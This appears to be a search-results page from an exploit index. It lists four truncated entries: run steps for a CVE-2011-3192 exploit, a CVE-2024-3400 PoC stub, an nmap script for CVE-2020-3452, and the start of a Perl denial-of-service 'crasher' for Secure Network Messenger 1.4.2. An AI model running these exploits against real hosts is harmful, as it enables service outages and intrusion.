4 matches found
CVE-2011-3192
CVE-2011-3192 python 3.7 또는 3.10을 사용하여 실행하세요 테스트 완료 1. git clone https://github.com/futurezayka/CVE-2011-3192.git 2. cd ./CVE-2011-3192 3. pip install -r requirements.txt 4. python3 exploit.py host tasks 예: python3 exploit.py https://example.com 50...
CVE-2024-3400-Canary
CVE-2024-3400 PoC Код Неужели мы ничему не научились у HoneyPoC? Использование Укажите хост: python3 Poc.py...
CVE-2020-3452-PoC
CVE-2020-3452 안녕하세요, 여러분. 이것은 nmap NSE 스크립트를 다운로드하여 NSE 모듈 파일에 넣고 원하는 호스트로 nmap 명령을 실행하는 간단한 스크립트입니다. 호스트 목록을 list.txt 파일에 넣으세요 감사합니다...
Secure Network Messenger 1.4.2 - Denial of Service
Secure Network Messenger 1.4.2 - Denial of Service !/usr/bin/perl use IO::Socket; print "\nSecure Network Messenger Crasher by ClearScreen\n"; print "\nEnter host to crash: "; $h = ; chomp $h; $socks = IO::Socket::INET-new Proto = "tcp", PeerPort = "6144", PeerAddr = "$h" or die "\nNo response fr...